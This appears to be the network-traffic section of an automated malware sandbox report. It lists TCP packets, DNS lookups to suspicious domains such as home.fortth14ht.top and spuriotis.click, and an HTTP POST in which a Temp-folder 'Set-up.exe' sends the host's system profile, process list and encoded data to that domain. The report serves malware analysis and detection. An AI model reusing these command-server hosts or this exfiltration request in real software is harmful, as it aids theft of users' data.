                                                                                                                                                                        Dec 28, 2024 09:57:08.732606888 CET44349724104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:09.732033014 CET44349724104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:09.732126951 CET44349724104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:09.732212067 CET49724443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:09.732435942 CET49724443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:09.732465982 CET44349724104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:09.920974970 CET49725443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:09.921017885 CET44349725104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:09.921087027 CET49725443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:09.921380997 CET49725443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:09.921394110 CET44349725104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:11.178951979 CET44349725104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:11.179090977 CET49725443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:11.188971043 CET49725443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:11.189001083 CET44349725104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:11.189280987 CET44349725104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:11.198056936 CET49725443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:11.202001095 CET49725443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:11.202017069 CET44349725104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:12.023581982 CET44349725104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:12.023711920 CET44349725104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:12.023787022 CET49725443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:12.023964882 CET49725443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:12.023987055 CET44349725104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:12.427515984 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:12.427572966 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:12.427701950 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:12.428014994 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:12.428035021 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.643686056 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.643765926 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.645693064 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.645706892 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.646071911 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.647644043 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.648690939 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.648740053 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.648859024 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.648897886 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.649012089 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.649056911 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.649184942 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.649225950 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.649359941 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.649393082 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.649544001 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.649574995 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.695347071 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.695545912 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.695606947 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.743341923 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.743534088 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.743593931 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.743609905 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.791346073 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.791702032 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.791774035 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.839337111 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.839504004 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.883343935 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.888933897 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:13.889034033 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:13.889056921 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:14.009438038 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:16.120728970 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:16.120830059 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:16.120897055 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:16.121181011 CET49726443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:16.121201038 CET44349726104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:16.132581949 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:16.132633924 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:16.132715940 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:16.133035898 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:16.133054018 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:17.397077084 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:17.397218943 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:17.398498058 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:17.398509026 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:17.398762941 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:17.400052071 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:17.400111914 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:17.400136948 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.198452950 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.198672056 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.198720932 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.198745966 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:18.198750973 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.198771000 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.198807955 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:18.198821068 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.198864937 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:18.198875904 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.210076094 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.210149050 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:18.210160971 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.218359947 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.218429089 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:18.218436003 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.226676941 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.226742983 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:18.226751089 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.226787090 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.226831913 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:18.226932049 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:18.226947069 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:18.226969957 CET49728443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:18.226975918 CET44349728104.21.2.51192.168.2.12
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 28, 2024 09:56:36.451435089 CET5374953192.168.2.121.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:56:36.451519012 CET5374953192.168.2.121.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:56:36.591531038 CET53537491.1.1.1192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:36.591542006 CET53537491.1.1.1192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:43.329765081 CET6135153192.168.2.121.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:56:43.554287910 CET53613511.1.1.1192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.187413931 CET6129753192.168.2.121.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:56:53.187475920 CET6129753192.168.2.121.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:56:53.485769033 CET53612971.1.1.1192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:53.636398077 CET53612971.1.1.1192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:57.522625923 CET5567253192.168.2.121.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:56:57.522696972 CET5567253192.168.2.121.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:56:57.664333105 CET53556721.1.1.1192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:57.664447069 CET53556721.1.1.1192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:57.826375008 CET5788153192.168.2.121.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:56:58.252166033 CET53578811.1.1.1192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.195799112 CET5788253192.168.2.121.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:56:59.195858002 CET5788253192.168.2.121.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:56:59.511045933 CET53578821.1.1.1192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.511054039 CET53578821.1.1.1192.168.2.12
                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 28, 2024 09:56:36.451435089 CET192.168.2.121.1.1.10xa18bStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:36.451519012 CET192.168.2.121.1.1.10x9cadStandard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:43.329765081 CET192.168.2.121.1.1.10x631cStandard query (0)yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVnA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:53.187413931 CET192.168.2.121.1.1.10x1a5dStandard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:53.187475920 CET192.168.2.121.1.1.10xddfbStandard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:57.522625923 CET192.168.2.121.1.1.10x5acStandard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:57.522696972 CET192.168.2.121.1.1.10xece5Standard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:57.826375008 CET192.168.2.121.1.1.10xccc7Standard query (0)spuriotis.clickA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:59.195799112 CET192.168.2.121.1.1.10x86f8Standard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:59.195858002 CET192.168.2.121.1.1.10x20acStandard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 28, 2024 09:56:36.591531038 CET1.1.1.1192.168.2.120xa18bNo error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:36.591531038 CET1.1.1.1192.168.2.120xa18bNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:43.554287910 CET1.1.1.1192.168.2.120x631cName error (3)yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:53.485769033 CET1.1.1.1192.168.2.120x1a5dNo error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:57.664333105 CET1.1.1.1192.168.2.120x5acNo error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:58.252166033 CET1.1.1.1192.168.2.120xccc7No error (0)spuriotis.click104.21.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:58.252166033 CET1.1.1.1192.168.2.120xccc7No error (0)spuriotis.click172.67.128.184A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:56:59.511045933 CET1.1.1.1192.168.2.120x86f8No error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                        • httpbin.org
                                                                                                                                                                        • spuriotis.click
                                                                                                                                                                        • home.fortth14ht.top
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.1249714194.87.58.92806744C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 28, 2024 09:56:53.758671045 CET12360OUTPOST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1
                                                                                                                                                                        Host: home.fortth14ht.top
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 502157
                                                                                                                                                                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 31 36 35 38 39 39 30 39 36 36 37 39 38 36 37 35 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                                                                                                                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8516589909667986758", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 336 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 580 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 760 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "fontdrvhost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": 876 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 404 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe" [TRUNCATED]
                                                                                                                                                                        Dec 28, 2024 09:56:53.878376007 CET2472OUTData Raw: 63 51 35 48 6c 4e 4b 71 6e 69 5a 78 70 4f 46 43 70 56 71 77 63 6b 35 77 6a 46 38 78 2b 62 2b 4b 5c 2f 30 61 5c 2f 47 33 77 50 79 7a 4b 73 34 38 55 75 42 73 52 77 70 6c 75 64 34 36 70 6c 75 56 34 71 72 6e 58 44 57 61 78 78 57 4e 70 59 65 57 4b 71
                                                                                                                                                                        Data Ascii: cQ5HlNKqniZxpOFCpVqwck5wjF8x+b+K\/0a\/G3wPyzKs48UuBsRwplud46pluV4qrnXDWaxxWNpYeWKqUFDIs5zSrSaw8ZVFOvTpU5JNRnKWh5\/RT2XHI6fyplf0CfhgUUUUGlPr8v1IXj5D+\/+f1\/z6NqxX70\/wDBLT9i79mn9o79n3xd43+M3w2\/4TLxNpXxg8QeE9P1H\/hL\/Hnh0W+gWPgzwDrNtZGz8KeKNCsZ
                                                                                                                                                                        Dec 28, 2024 09:56:53.878448009 CET4944OUTData Raw: 6f 61 74 31 47 7a 64 68 2b 4a 5c 2f 77 72 57 47 33 7a 5c 2f 52 48 5a 54 36 5c 2f 4c 39 53 6e 55 63 6e 62 38 66 36 56 4f 5c 2f 58 38 50 36 6d 6d 56 5a 6f 56 36 6a 6b 48 33 33 5c 2f 45 66 5c 2f 58 71 7a 4a 39 78 76 70 55 56 42 30 46 65 71 38 6e 2b
                                                                                                                                                                        Data Ascii: oat1Gzdh+J\/wrWG3z\/RHZT6\/L9SnUcnb8f6VO\/X8P6mmVZoV6jkH33\/Ef\/XqzJ9xvpUVB0Feq8n+wm7H+e9XJO34\/0qt91u+P6H\/P6UHVS6f4f8hnTZ\/H0\/r\/AJ\/Hv3Y33X+o\/ktTbvv\/AMH+f89enU9KZQbFM\/8ALP8AD+lQP0\/H+hq7sb0\/l\/jUMiudh+\/\/AJ\/n29vxoLhv8v1RTK\/3E\/8AIv0
                                                                                                                                                                        Dec 28, 2024 09:56:53.878570080 CET7416OUTData Raw: 2b 31 7a 46 6f 69 61 74 42 70 46 78 34 4e 38 56 36 76 5a 57 75 74 58 4f 75 54 36 68 62 6e 78 46 38 4f 50 44 48 69 4f 5c 2f 77 44 74 4d 66 69 4b 65 66 56 37 4f 36 76 4e 56 31 61 5c 2f 31 4c 55 4c 4f 38 4d 63 38 65 70 33 74 38 39 78 43 6c 31 4c 50
                                                                                                                                                                        Data Ascii: +1zFoiatBpFx4N8V6vZWutXOuT6hbnxF8OPDHiO\/wDtMfiKefV7O6vNV1a\/1LULO8Mc8ep3t89xCl1LPn+yfDeOcZHxzw9jMFicblWJ\/wBZ8nyjMMRgMVVoOu6OeYGhi8BPFYWsnWw953dBzqUKtPlko23\/AAzxVo5BxB4d8U4fMcBluc0f9T8\/zXAUczwNDFfVnPh\/MMRhMwpYfG0JOhXTovlrKFOvSqJXkpKy\/jzqO
                                                                                                                                                                        Dec 28, 2024 09:56:53.878659010 CET4944OUTData Raw: 6c 55 63 36 34 66 34 75 79 37 68 6a 4f 63 5a 67 4b 6c 44 47 51 39 70 69 63 69 7a 4c 45 30 4b 6b 63 46 6d 46 48 45 59 61 6a 68 63 58 58 77 75 42 70 34 58 46 63 38 71 38 76 71 6c 57 6c 4b 56 44 53 6a 49 5c 2f 30 39 2b 68 5c 2f 77 44 58 38 54 5c 2f
                                                                                                                                                                        Data Ascii: lUc64f4uy7hjOcZgKlDGQ9picizLE0KkcFmFHEYajhcXXwuBp4XFc8q8vqlWlKVDSjI\/09+h\/wDX8T\/Dd47KM1jkfFHBmbcXZBgc1hXwVSphcHxDlmBxlKpjMtr0MVXxWEo4zMK2IwjjTw8HiqOIpxxCbrRPzV\/Yp+JnxN+I3gv4xDxLpGkaf8OtBvUsfhx\/Y2i6R4fs9MEyare6v4disdIsbOC4axtbjRbu5nYZgub51V
                                                                                                                                                                        Dec 28, 2024 09:56:53.878860950 CET4944OUTData Raw: 39 5c 2f 77 42 50 5c 2f 72 31 4a 55 59 5c 2f 35 61 66 6a 5c 2f 41 46 72 4d 36 50 66 5c 2f 41 4c 76 34 6b 4d 69 34 5c 2f 44 2b 52 5c 2f 77 41 5c 2f 7a 71 47 72 46 51 76 39 34 5c 2f 68 5c 2f 49 55 47 76 4f 5c 2f 4c 2b 76 6d 56 32 58 62 6a 76 6d 6d
                                                                                                                                                                        Data Ascii: 9\/wBP\/r1JUY\/5afj\/AFrM6Pf\/ALv4kMi4\/D+R\/wA\/zqGrFQv94\/h\/IUGvO\/L+vmV2Xbjvmm1YqJ+v4f1NBqMqCSP5eufw\/wA9elT0UHQUpI\/l44+vf\/PT6fqypn+6fw\/mKhoOgh5Y\/wCeKZ\/Gn1NSydvx\/pUdB2U+vyIfmb1P8v8ADNRtGnuE6f5z\/npVqo5O34\/0oHDb5\/oinJF\/cHr2\/oP8fXm
                                                                                                                                                                        Dec 28, 2024 09:56:53.997963905 CET2472OUTData Raw: 70 38 54 5c 2f 41 49 51 2b 45 5c 2f 42 58 6a 4c 78 68 59 65 45 68 34 43 2b 41 48 6a 4f 7a 67 30 2b 4c 53 76 69 44 34 5a 69 73 74 51 38 61 58 76 68 42 4a 72 36 37 6c 6a 6d 6a 74 72 57 33 65 37 50 35 6e 6a 50 47 48 77 77 77 4e 64 59 58 45 38 5a 35
                                                                                                                                                                        Data Ascii: p8T\/AIQ+E\/BXjLxhYeEh4C+AHjOzg0+LSviD4ZistQ8aXvhBJr67ljmjtrW3e7P5njPGHwwwNdYXE8Z5UsY8fmeWLBUVisVjv7QyfH5flmZYP6lhcPWxX1jDY3Nssoun7HmqLH4StR9pQr06kv2HAeAnjDmVJ4nC8A539Ujl+X5rLHYn6lgcBHLM0y\/G5pgse8fjsXh8H9VqYHLcwrzre35MO8FiaOJdGvRqUo+9\/s4ftT\
                                                                                                                                                                        Dec 28, 2024 09:56:53.998038054 CET4944OUTData Raw: 2f 77 42 41 5c 2f 77 44 77 5c 2f 58 50 5c 2f 41 45 61 79 50 5c 2f 44 34 66 5c 2f 69 67 6f 5c 2f 34 66 72 6e 5c 2f 6f 31 6b 66 2b 48 77 5c 2f 5c 2f 41 42 51 56 2b 43 6c 78 70 4f 69 2b 48 62 48 78 78 63 66 46 48 34 72 5c 2f 41 41 62 2b 44 57 6f 65
                                                                                                                                                                        Data Ascii: /wBA\/wDw\/XP\/AEayP\/D4f\/igo\/4frn\/o1kf+Hw\/\/ABQV+ClxpOi+HbHxxcfFH4r\/AAb+DWoeBv2gvil+zNN4f8dXvxm1nWfEnxQ+D+heD\/EXi+18MH4S\/Az4n6I+i\/2X468OS6VrHiPWfDVvqBvg6iK3V7gX9F8KWmq3Hgjw1qHxT+CnhD4tfEvQdK8R\/D74E+L\/ABV44sfif4p0\/wAVWjX3w8he90n4Y65
                                                                                                                                                                        Dec 28, 2024 09:56:53.998183966 CET2472OUTData Raw: 5c 2f 79 30 5c 2f 77 41 5c 2f 54 2b 6e 51 63 79 48 66 35 6d 7a 6c 5c 2f 73 5c 2f 39 5c 2f 77 44 44 38 61 71 37 74 76 38 41 48 38 34 34 36 5c 2f 38 41 6b 31 5c 2f 6e 31 5c 2f 43 74 43 78 35 5a 2b 55 5c 2f 37 39 53 53 66 35 5c 2f 7a 2b 74 51 5c 2f
                                                                                                                                                                        Data Ascii: \/y0\/wA\/T+nQcyHf5mzl\/s\/9\/wDD8aq7tv8AH8446\/8Ak1\/n1\/CtCx5Z+U\/79SSf5\/z+tQ\/P5e8\/J+XX\/p0\/lT\/9YB8n7r\/ll3\/zwfzzUK5+4f8ASU\/66\/v4fw5\/lXOdfO\/L+vmMm+78kfz\/AOql\/wCm3+evT0\/GFlTzHKfPH\/qvM\/5b\/wCev6Vfb+B\/3j+XL+657\/r1\/KqzbI8bPuf5\
                                                                                                                                                                        Dec 28, 2024 09:56:53.998224974 CET2472OUTData Raw: 34 50 32 33 50 32 62 64 57 38 52 32 32 67 65 4d 4e 43 2b 4d 6e 67 33 77 78 34 47 38 44 36 4e 38 51 50 6a 5a 38 48 66 44 2b 6e 33 33 69 62 34 61 2b 4f 66 32 6a 37 61 33 38 53 65 4b 5c 2f 42 76 78 43 2b 4c 5c 2f 67 48 78 4e 38 51 49 37 7a 55 39 41
                                                                                                                                                                        Data Ascii: 4P23P2bdW8R22geMNC+Mng3wx4G8D6N8QPjZ8HfD+n33ib4a+Of2j7a38SeK\/BvxC+L\/gHxN8QI7zU9A03U\/p2SNJUaOVEkjcYdJFDow9GVgVYexBFZj6DockQgk0XSZIQciF9Os2iByTkRtCUzkk5xnJJ71\/PnjD4C5d4uZ5wtn2Mz3HZTi+EsLjKOW08NTp1KE6+KzjIM5+s11K1VTp1OH6GGhPD1aFWOExmYUo1FLERq
                                                                                                                                                                        Dec 28, 2024 09:56:53.998264074 CET2472OUTData Raw: 62 2b 42 50 67 7a 77 42 34 73 2b 44 48 69 72 57 66 32 4c 66 6a 39 71 66 77 5a 38 56 36 6c 72 50 67 58 78 68 61 33 70 74 74 66 2b 44 58 6a 71 77 61 44 52 72 37 55 62 78 59 37 62 53 4c 71 30 39 74 58 54 39 4d 56 35 5a 46 30 32 78 57 53 59 59 6d 6b
                                                                                                                                                                        Data Ascii: b+BPgzwB4s+DHirWf2Lfj9qfwZ8V6lrPgXxha3pttf+DXjqwaDRr7UbxY7bSLq09tXT9MV5ZF02xWSYYmkW1tw8o9JWEW6Qezk1SPhfwwwLt4c0FixLMTpGnklieSSbbJJPUnk9a\/lvNfoXZBmGdSzulxVm2Hr1834pzbF0nh8JWo1anFHG+VceVqUaVfD1sNyYTNcpo4aj7fDYj2+XVq+Fx6xjhgquD\/tDJP2hPFuV5AuH6\
                                                                                                                                                                        Dec 28, 2024 09:56:57.466742992 CET157INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.22.1
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:56:57 GMT
                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
